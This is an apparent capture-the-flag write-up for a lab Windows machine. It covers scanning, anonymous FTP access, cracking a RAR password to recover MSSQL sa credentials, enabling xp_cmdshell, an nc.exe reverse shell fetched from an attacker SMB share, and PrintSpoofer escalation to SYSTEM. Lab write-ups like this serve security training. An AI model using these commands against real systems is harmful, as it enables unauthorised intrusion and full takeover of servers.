# Meathead

## Nmap

```
sudo nmap 192.168.67.70 -p- -sV -sS  

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open  ftp           Microsoft ftpd
1435/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; 
CPE: cpe:/o:microsoft:windows
```

`FTP` on port 1221 allows anonymous login with passive mode `-p` enabled.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9d2a63a2755c56b2806be3f6d18d620e1bb116ca%2Fimage.png?alt=media)

Using the `get` command to downloaded the MSSQL\_BAK.rar file and then using the `unrar` command shows that we need a password to extract the archive.

```
unrar e <archive)
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e64ab1476d6cec427e77748f81317a73ebbcaf43%2Fimage.png?alt=media)

We can use the `rar2john` binary that comes with John to get a hash from the password protected RAR file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e8eeb5f1bb65a6c2ce99200aa6820c8c198cddf%2Fimage.png?alt=media)

On my main Windows host I used `hashcat` crack the hash. I have also shown the command used below the `cmd.exe` windows. The cracked password is: `letmeinplease`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5569ce871789ae59f5438e6620ecf15151d1ecd6%2Fimage.png?alt=media)

Back on the Kali VM I ran `unrar` again and this time was successful in extracting the archive.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6fb2aea6ee040b0aa88e9510216f6b58cdd37546%2Fimage.png?alt=media)

Reading the contents of mssql\_backup.txt provides the following credentials `sa:EjectFrailtyThorn425`

We are then able to Impacket's `mssqlclient.py` to connect to the target machines SQL.

```
mssqlclient.py -port 1435 sa:EjectFrailtyThorn425@192.168.67.70
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f7ec6524fcf2b8cad12e86f8160507428176114d%2Fimage.png?alt=media)

From here we can run `enable_xp_cmdshell` and then confirm command execution with `xp_cmdshell whoami`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5e858ba3f24e10ea1703b34f459c470ed9f526bc%2Fimage.png?alt=media)

From here due to various reasons I was unable to use `certutil.exe` and `Powershell` for file transfer. Instead I set up a `SMB` server on my attacking machine with Impacket's `smbserver.py`.

```
sudo python2 smbserver.py Share /home/kali/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab6c7855785afa326218ed9a8404dad399549859%2Fimage.png?alt=media)

From here we need to ensure nc.exe exists in the same directory in which the `SMB` Server is sharing files from. Set up a `netcat` listener on the attacking machine.

```
nc -lvp 1221
```

Then run the following command on the SQL server running the xp\_cmdshell.

```
xp_cmdshell \\192.168.49.67\Share\nc.exe -e cmd.exe 192.168.49.67 1221
```

We now have a proper reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a66d382b686becf6f430e07dbdb9197515e6ec2c%2Fimage.png?alt=media)

Now connected and checking privileges with the `whoami /all` command we see we have the `SeImpersonatePrivilege` permission.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dca70ce8ae85d6bfdd56936ecd632f125a9912a6%2Fimage.png?alt=media)

Checking `systeminfo` for the version of Windows server running we see we are on Windows Server 2019.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f25bd668831a40ba50a766b45076830f94b02806%2Fimage.png?alt=media)

Given the privileges and version of Windows Server running it is unlikely a JuicyPotato attack would be successful. It is probable however that we can take advantage of these permissions with a `PrintSpoofer.exe` attack.

Binary: <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

Download the binary and place it in the `SMB` share we set up earlier with `smbserver.py`. I then moved over to the FTP directory at `C:\FTP` as this is writeable to the current service account 'mssql$sqlexpress'.

I then copied the binary to the current working directory:

```bash
copy \\<Attacking-IP>\Share\PrintSpoofer.exe
```

Then executed the `PrintSpoofer.exe` with switches to spawn a **SYSTEM** shell in the current shell.

```bash
printspoofer.exe -i -c cmd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dce1879502dfe1b6a839f79d4f90b38299b847cf%2Fimage.png?alt=media)